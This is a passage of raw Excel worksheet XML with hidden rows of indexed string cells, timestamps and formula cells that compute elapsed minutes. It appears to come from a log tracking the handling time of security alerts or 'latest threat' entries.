        <f t="shared" ref="BC35:BC66" si="8">IF(A35&lt;&gt;"最新威胁",IF(ISBLANK(AF35),ROUND((AC35-B35)*24*60,2),ROUND((AF35-B35)*24*60,2)),"")</f>
        <v>0.02</v>
      </c>
      <c r="BD35" s="9">
        <f t="shared" ref="BD35:BD66" si="9">IF(A35&lt;&gt;"最新威胁",IF(ISBLANK(AG35),ROUND((AC35-B35)*24*60,2),ROUND((AG35-B35)*24*60,2)),"")</f>
        <v>0.02</v>
      </c>
    </row>
    <row r="36" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A36" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B36" s="2">
        <v>45915.3373726852</v>
      </c>
      <c r="C36" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D36" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E36" s="10" t="s">
        <v>422</v>
      </c>
      <c r="F36" s="10" t="s">
        <v>11620</v>
      </c>
      <c r="G36" s="10"/>
      <c r="H36" s="10"/>
      <c r="I36" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J36" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K36" s="10"/>
      <c r="L36" s="10"/>
      <c r="M36" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N36" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O36" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P36" s="10"/>
      <c r="Q36" s="10"/>
      <c r="R36" s="10"/>
      <c r="S36" s="10" t="s">
        <v>8663</v>
      </c>
      <c r="T36" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U36" s="10" t="s">
        <v>8557</v>
      </c>
      <c r="V36" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W36" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X36" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y36" s="10" t="s">
        <v>11373</v>
      </c>
      <c r="Z36" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA36" s="10"/>
      <c r="AB36" s="10"/>
      <c r="AC36" s="14">
        <v>45915.3373726852</v>
      </c>
      <c r="AD36" s="14">
        <v>45914.9893055556</v>
      </c>
      <c r="AE36" s="14"/>
      <c r="AF36" s="14"/>
      <c r="AG36" s="14"/>
      <c r="AH36" s="10"/>
      <c r="AI36" s="10"/>
      <c r="AJ36" s="10"/>
      <c r="AK36" s="10"/>
      <c r="AL36" s="10"/>
      <c r="AM36" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN36" s="10"/>
      <c r="AO36" s="10" t="s">
        <v>8557</v>
      </c>
      <c r="AP36" s="10"/>
      <c r="AQ36" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR36" s="10"/>
      <c r="AS36" s="10"/>
      <c r="AT36" s="10"/>
      <c r="AU36" s="10"/>
      <c r="AV36" s="10"/>
      <c r="AW36" s="10"/>
      <c r="AX36" s="10"/>
      <c r="AY36" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ36" s="9">
        <f t="shared" si="6"/>
        <v>501.22</v>
      </c>
      <c r="BA36" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB36" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC36" s="9">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BD36" s="9">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A37" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B37" s="2">
        <v>45919.0387152778</v>
      </c>
      <c r="C37" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D37" s="10" t="s">
        <v>10543</v>
      </c>
      <c r="E37" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F37" s="10" t="s">
        <v>11567</v>
      </c>
      <c r="G37" s="10"/>
      <c r="H37" s="10"/>
      <c r="I37" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J37" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K37" s="10"/>
      <c r="L37" s="10"/>
      <c r="M37" s="10" t="s">
        <v>11569</v>
      </c>
      <c r="N37" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O37" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P37" s="10"/>
      <c r="Q37" s="10"/>
      <c r="R37" s="10"/>
      <c r="S37" s="10" t="s">
        <v>8663</v>
      </c>
      <c r="T37" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U37" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V37" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W37" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X37" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y37" s="10" t="s">
        <v>11367</v>
      </c>
      <c r="Z37" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA37" s="10"/>
      <c r="AB37" s="10"/>
      <c r="AC37" s="14">
        <v>45919.0387268519</v>
      </c>
      <c r="AD37" s="14">
        <v>45919.0352199074</v>
      </c>
      <c r="AE37" s="14"/>
      <c r="AF37" s="14"/>
      <c r="AG37" s="14"/>
      <c r="AH37" s="10"/>
      <c r="AI37" s="10"/>
      <c r="AJ37" s="10"/>
      <c r="AK37" s="10"/>
      <c r="AL37" s="10"/>
      <c r="AM37" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN37" s="10"/>
      <c r="AO37" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP37" s="10"/>
      <c r="AQ37" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR37" s="10"/>
      <c r="AS37" s="10"/>
      <c r="AT37" s="10"/>
      <c r="AU37" s="10"/>
      <c r="AV37" s="10"/>
      <c r="AW37" s="10"/>
      <c r="AX37" s="14"/>
      <c r="AY37" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ37" s="9">
        <f t="shared" si="6"/>
        <v>5.03</v>
      </c>
      <c r="BA37" s="9">
        <f t="shared" si="5"/>
        <v>0.02</v>
      </c>
      <c r="BB37" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC37" s="9">
        <f t="shared" si="8"/>
        <v>0.02</v>
      </c>
      <c r="BD37" s="9">
        <f t="shared" si="9"/>
        <v>0.02</v>
      </c>
    </row>
    <row r="38" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A38" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B38" s="2">
        <v>45944.2273148148</v>
      </c>
      <c r="C38" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D38" s="10" t="s">
        <v>8655</v>
      </c>
      <c r="E38" s="10" t="s">
        <v>3620</v>
      </c>
      <c r="F38" s="10" t="s">
        <v>11618</v>
      </c>
      <c r="G38" s="10"/>
      <c r="H38" s="10"/>
      <c r="I38" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J38" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K38" s="10"/>
      <c r="L38" s="10"/>
      <c r="M38" s="10" t="s">
        <v>3693</v>
      </c>
      <c r="N38" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O38" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P38" s="10"/>
      <c r="Q38" s="10"/>
      <c r="R38" s="10"/>
      <c r="S38" s="10" t="s">
        <v>8663</v>
      </c>
      <c r="T38" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U38" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="V38" s="12" t="s">
        <v>8460</v>
      </c>
      <c r="W38" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X38" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y38" s="10" t="s">
        <v>11339</v>
      </c>
      <c r="Z38" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA38" s="10"/>
      <c r="AB38" s="10"/>
      <c r="AC38" s="14">
        <v>45944.2698263889</v>
      </c>
      <c r="AD38" s="14">
        <v>45943.8794907407</v>
      </c>
      <c r="AE38" s="14"/>
      <c r="AF38" s="14"/>
      <c r="AG38" s="14"/>
      <c r="AH38" s="10"/>
      <c r="AI38" s="10"/>
      <c r="AJ38" s="10"/>
      <c r="AK38" s="10"/>
      <c r="AL38" s="10"/>
      <c r="AM38" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN38" s="10"/>
      <c r="AO38" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="AP38" s="10"/>
      <c r="AQ38" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR38" s="10"/>
      <c r="AS38" s="10"/>
      <c r="AT38" s="10"/>
      <c r="AU38" s="10"/>
      <c r="AV38" s="10"/>
      <c r="AW38" s="10"/>
      <c r="AX38" s="14"/>
      <c r="AY38" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ38" s="9">
        <f t="shared" si="6"/>
        <v>500.87</v>
      </c>
      <c r="BA38" s="9">
        <f t="shared" si="5"/>
        <v>61.22</v>
      </c>
      <c r="BB38" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC38" s="9">
        <f t="shared" si="8"/>
        <v>61.22</v>
      </c>
      <c r="BD38" s="9">
        <f t="shared" si="9"/>
        <v>61.22</v>
      </c>
    </row>
    <row r="39" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A39" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B39" s="2">
        <v>45960.0905555556</v>
      </c>
      <c r="C39" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D39" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E39" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F39" s="10" t="s">
        <v>11575</v>
      </c>
      <c r="G39" s="10"/>
      <c r="H39" s="10"/>
      <c r="I39" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J39" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K39" s="10"/>
      <c r="L39" s="10"/>
      <c r="M39" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N39" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O39" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P39" s="10"/>
      <c r="Q39" s="10"/>
      <c r="R39" s="10"/>
      <c r="S39" s="10" t="s">
        <v>8805</v>
      </c>
      <c r="T39" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U39" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V39" s="12" t="s">
        <v>8460</v>
      </c>
      <c r="W39" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X39" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y39" s="10" t="s">
        <v>11237</v>
      </c>
      <c r="Z39" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA39" s="10"/>
      <c r="AB39" s="10"/>
      <c r="AC39" s="14">
        <v>45960.0905671296</v>
      </c>
      <c r="AD39" s="14">
        <v>45960.0880092593</v>
      </c>
      <c r="AE39" s="14"/>
      <c r="AF39" s="14"/>
      <c r="AG39" s="14"/>
      <c r="AH39" s="10"/>
      <c r="AI39" s="10"/>
      <c r="AJ39" s="10"/>
      <c r="AK39" s="10"/>
      <c r="AL39" s="10"/>
      <c r="AM39" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN39" s="10"/>
      <c r="AO39" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP39" s="10"/>
      <c r="AQ39" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR39" s="10"/>
      <c r="AS39" s="10"/>
      <c r="AT39" s="10"/>
      <c r="AU39" s="10"/>
      <c r="AV39" s="10"/>
      <c r="AW39" s="10"/>
      <c r="AX39" s="10"/>
      <c r="AY39" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ39" s="9">
        <f t="shared" si="6"/>
        <v>3.67</v>
      </c>
      <c r="BA39" s="9">
        <f t="shared" si="5"/>
        <v>0.02</v>
      </c>
      <c r="BB39" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC39" s="9">
        <f t="shared" si="8"/>
        <v>0.02</v>
      </c>
      <c r="BD39" s="9">
        <f t="shared" si="9"/>
        <v>0.02</v>
      </c>
    </row>
    <row r="40" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A40" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B40" s="2">
        <v>45960.9992013889</v>
      </c>
      <c r="C40" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D40" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E40" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F40" s="10" t="s">
        <v>11591</v>
      </c>
      <c r="G40" s="10"/>
      <c r="H40" s="10"/>
      <c r="I40" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J40" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K40" s="10"/>
      <c r="L40" s="10"/>
      <c r="M40" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N40" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O40" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P40" s="10"/>
      <c r="Q40" s="10"/>
      <c r="R40" s="10"/>
      <c r="S40" s="10" t="s">
        <v>8805</v>
      </c>
      <c r="T40" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U40" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V40" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W40" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X40" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y40" s="10" t="s">
        <v>11193</v>
      </c>
      <c r="Z40" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA40" s="10"/>
      <c r="AB40" s="10"/>
      <c r="AC40" s="14">
        <v>45960.9993518519</v>
      </c>
      <c r="AD40" s="14">
        <v>45960.9967708333</v>
      </c>
      <c r="AE40" s="14"/>
      <c r="AF40" s="14"/>
      <c r="AG40" s="14"/>
      <c r="AH40" s="10"/>
      <c r="AI40" s="10"/>
      <c r="AJ40" s="10"/>
      <c r="AK40" s="10"/>
      <c r="AL40" s="10"/>
      <c r="AM40" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN40" s="10"/>
      <c r="AO40" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP40" s="10"/>
      <c r="AQ40" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR40" s="10"/>
      <c r="AS40" s="10"/>
      <c r="AT40" s="10"/>
      <c r="AU40" s="10"/>
      <c r="AV40" s="10"/>
      <c r="AW40" s="10"/>
      <c r="AX40" s="14"/>
      <c r="AY40" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ40" s="9">
        <f t="shared" si="6"/>
        <v>3.5</v>
      </c>
      <c r="BA40" s="9">
        <f t="shared" si="5"/>
        <v>0.22</v>
      </c>
      <c r="BB40" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC40" s="9">
        <f t="shared" si="8"/>
        <v>0.22</v>
      </c>
      <c r="BD40" s="9">
        <f t="shared" si="9"/>
        <v>0.22</v>
      </c>
    </row>
    <row r="41" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A41" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B41" s="2">
        <v>45961.0049305556</v>
      </c>
      <c r="C41" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D41" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E41" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F41" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G41" s="10"/>
      <c r="H41" s="10"/>
      <c r="I41" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J41" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K41" s="10"/>
      <c r="L41" s="10"/>
      <c r="M41" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N41" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O41" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P41" s="10"/>
      <c r="Q41" s="10"/>
      <c r="R41" s="10"/>
      <c r="S41" s="10" t="s">
        <v>8805</v>
      </c>
      <c r="T41" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U41" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V41" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W41" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X41" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y41" s="10" t="s">
        <v>11191</v>
      </c>
      <c r="Z41" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA41" s="10"/>
      <c r="AB41" s="10"/>
      <c r="AC41" s="14">
        <v>45961.0051388889</v>
      </c>
      <c r="AD41" s="14">
        <v>45961.0019212963</v>
      </c>
      <c r="AE41" s="14"/>
      <c r="AF41" s="14"/>
      <c r="AG41" s="14"/>
      <c r="AH41" s="10"/>
      <c r="AI41" s="10"/>
      <c r="AJ41" s="10"/>
      <c r="AK41" s="10"/>
      <c r="AL41" s="10"/>
      <c r="AM41" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN41" s="10"/>
      <c r="AO41" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP41" s="10"/>
      <c r="AQ41" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR41" s="10"/>
      <c r="AS41" s="10"/>
      <c r="AT41" s="10"/>
      <c r="AU41" s="10"/>
      <c r="AV41" s="10"/>
      <c r="AW41" s="10"/>
      <c r="AX41" s="14"/>
      <c r="AY41" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ41" s="9">
        <f t="shared" si="6"/>
        <v>4.33</v>
      </c>
      <c r="BA41" s="9">
        <f t="shared" si="5"/>
        <v>0.3</v>
      </c>
      <c r="BB41" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC41" s="9">
        <f t="shared" si="8"/>
        <v>0.3</v>
      </c>
      <c r="BD41" s="9">
        <f t="shared" si="9"/>
        <v>0.3</v>
      </c>
    </row>
    <row r="42" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A42" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B42" s="2">
        <v>45961.0813425926</v>
      </c>
      <c r="C42" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D42" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E42" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F42" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G42" s="10"/>
      <c r="H42" s="10"/>
      <c r="I42" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J42" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K42" s="10"/>
      <c r="L42" s="10"/>
      <c r="M42" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N42" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O42" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P42" s="10"/>
      <c r="Q42" s="10"/>
      <c r="R42" s="10"/>
      <c r="S42" s="10" t="s">
        <v>8805</v>
      </c>
      <c r="T42" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U42" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V42" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W42" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X42" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y42" s="10" t="s">
        <v>11186</v>
      </c>
      <c r="Z42" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA42" s="10"/>
      <c r="AB42" s="10"/>
      <c r="AC42" s="14">
        <v>45961.0814699074</v>
      </c>
      <c r="AD42" s="14">
        <v>45961.0789351852</v>
      </c>
      <c r="AE42" s="14"/>
      <c r="AF42" s="14"/>
      <c r="AG42" s="14"/>
      <c r="AH42" s="10"/>
      <c r="AI42" s="10"/>
      <c r="AJ42" s="10"/>
      <c r="AK42" s="10"/>
      <c r="AL42" s="10"/>
      <c r="AM42" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN42" s="10"/>
      <c r="AO42" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP42" s="10"/>
      <c r="AQ42" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR42" s="10"/>
      <c r="AS42" s="10"/>
      <c r="AT42" s="10"/>
      <c r="AU42" s="10"/>
      <c r="AV42" s="10"/>
      <c r="AW42" s="10"/>
      <c r="AX42" s="10"/>
      <c r="AY42" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ42" s="9">
        <f t="shared" si="6"/>
        <v>3.47</v>
      </c>
      <c r="BA42" s="9">
        <f t="shared" si="5"/>
        <v>0.18</v>
      </c>
      <c r="BB42" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC42" s="9">
        <f t="shared" si="8"/>
        <v>0.18</v>
      </c>
      <c r="BD42" s="9">
        <f t="shared" si="9"/>
        <v>0.18</v>
      </c>
    </row>
    <row r="43" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A43" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B43" s="2">
        <v>45961.3685763889</v>
      </c>
      <c r="C43" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D43" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E43" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F43" s="10" t="s">
        <v>11591</v>
      </c>
      <c r="G43" s="10"/>
      <c r="H43" s="10"/>
      <c r="I43" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J43" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K43" s="10"/>
      <c r="L43" s="10"/>
      <c r="M43" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N43" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O43" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P43" s="10"/>
      <c r="Q43" s="10"/>
      <c r="R43" s="10"/>
      <c r="S43" s="10" t="s">
        <v>8805</v>
      </c>
      <c r="T43" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U43" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V43" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W43" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X43" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y43" s="10" t="s">
        <v>11179</v>
      </c>
      <c r="Z43" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA43" s="10"/>
      <c r="AB43" s="10"/>
      <c r="AC43" s="14">
        <v>45961.3685763889</v>
      </c>
      <c r="AD43" s="14">
        <v>45961.3655208333</v>
      </c>
      <c r="AE43" s="14"/>
      <c r="AF43" s="14"/>
      <c r="AG43" s="14"/>
      <c r="AH43" s="10"/>
      <c r="AI43" s="10"/>
      <c r="AJ43" s="10"/>
      <c r="AK43" s="10"/>
      <c r="AL43" s="10"/>
      <c r="AM43" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN43" s="10"/>
      <c r="AO43" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP43" s="10"/>
      <c r="AQ43" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR43" s="10"/>
      <c r="AS43" s="10"/>
      <c r="AT43" s="10"/>
      <c r="AU43" s="10"/>
      <c r="AV43" s="10"/>
      <c r="AW43" s="10"/>
      <c r="AX43" s="14"/>
      <c r="AY43" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ43" s="9">
        <f t="shared" si="6"/>
        <v>4.4</v>
      </c>
      <c r="BA43" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB43" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC43" s="9">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BD43" s="9">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
    </row>
    <row r="44" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A44" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B44" s="2">
        <v>45968.3953240741</v>
      </c>
      <c r="C44" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D44" s="10" t="s">
        <v>10543</v>
      </c>
      <c r="E44" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F44" s="10" t="s">
        <v>11567</v>
      </c>
      <c r="G44" s="10"/>
      <c r="H44" s="10"/>
      <c r="I44" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J44" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K44" s="10"/>
      <c r="L44" s="10"/>
      <c r="M44" s="10" t="s">
        <v>11569</v>
      </c>
      <c r="N44" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O44" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P44" s="10"/>
      <c r="Q44" s="10"/>
      <c r="R44" s="10"/>
      <c r="S44" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T44" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U44" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V44" s="17" t="s">
        <v>8460</v>
      </c>
      <c r="W44" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X44" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y44" s="10" t="s">
        <v>11126</v>
      </c>
      <c r="Z44" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA44" s="10"/>
      <c r="AB44" s="10"/>
      <c r="AC44" s="14">
        <v>45968.3953240741</v>
      </c>
      <c r="AD44" s="14">
        <v>45968.3925925926</v>
      </c>
      <c r="AE44" s="14"/>
      <c r="AF44" s="14"/>
      <c r="AG44" s="14"/>
      <c r="AH44" s="10"/>
      <c r="AI44" s="10"/>
      <c r="AJ44" s="10"/>
      <c r="AK44" s="10"/>
      <c r="AL44" s="10"/>
      <c r="AM44" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN44" s="10"/>
      <c r="AO44" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP44" s="10"/>
      <c r="AQ44" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR44" s="10"/>
      <c r="AS44" s="10"/>
      <c r="AT44" s="10"/>
      <c r="AU44" s="10"/>
      <c r="AV44" s="10"/>
      <c r="AW44" s="10"/>
      <c r="AX44" s="14"/>
      <c r="AY44" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ44" s="9">
        <f t="shared" si="6"/>
        <v>3.93</v>
      </c>
      <c r="BA44" s="9">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BB44" s="9" t="str">
        <f t="shared" si="7"/>
        <v/>
      </c>
      <c r="BC44" s="9">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BD44" s="9">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
    </row>
    <row r="45" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A45" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B45" s="2">
        <v>45977.5275810185</v>
      </c>
      <c r="C45" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D45" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E45" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F45" s="10" t="s">
        <v>11591</v>
      </c>
      <c r="G45" s="10"/>
      <c r="H45" s="10"/>
      <c r="I45" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J45" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K45" s="10"/>
      <c r="L45" s="10"/>
      <c r="M45" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N45" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O45" s="17" t="s">
        <v>8432</v>
      </c>
      <c r="P45" s="10"/>
      <c r="Q45" s="10"/>
      <c r="R45" s="10"/>
      <c r="S45" s="10" t="s">
        <v>9950</v>
      </c>
      <c r="T45" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U45" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V45" s="12" t="s">
        <v>8460</v>
      </c>
      <c r="W45" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X45" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y45" s="10" t="s">
        <v>10991</v>
      </c>
      <c r="Z45" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA45" s="10"/>
      <c r="AB45" s="10"/>
      <c r="AC45" s="14">
        <v>45977.5294212963</v>
      </c>
      <c r="AD45" s="14">
        <v>45977.5247106481</v>
      </c>
      <c r="AE45" s="10"/>
      <c r="AF45" s="10"/>
      <c r="AG45" s="14"/>
      <c r="AH45" s="10"/>
      <c r="AI45" s="10"/>
      <c r="AJ45" s="10"/>
      <c r="AK45" s="10"/>
      <c r="AL45" s="10"/>
      <c r="AM45" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN45" s="10"/>
      <c r="AO45" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP45" s="10"/>
      <c r="AQ45" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR45" s="10"/>
      <c r="AS45" s="10"/>
      <c r="AT45" s="10"/>
      <c r="AU45" s="10"/>
      <c r="AV45" s="10"/>
      <c r="AW45" s="10"/>
      <c r="AX45" s="14"/>
      <c r="AY45" s="1" t="s">
        <v>11592</v>
      </c>
      <c r="AZ45" s="9">
        <f t="shared" si="6"/>
        <v>4.13</v>
      </c>
      <c r="BA45" s="9">
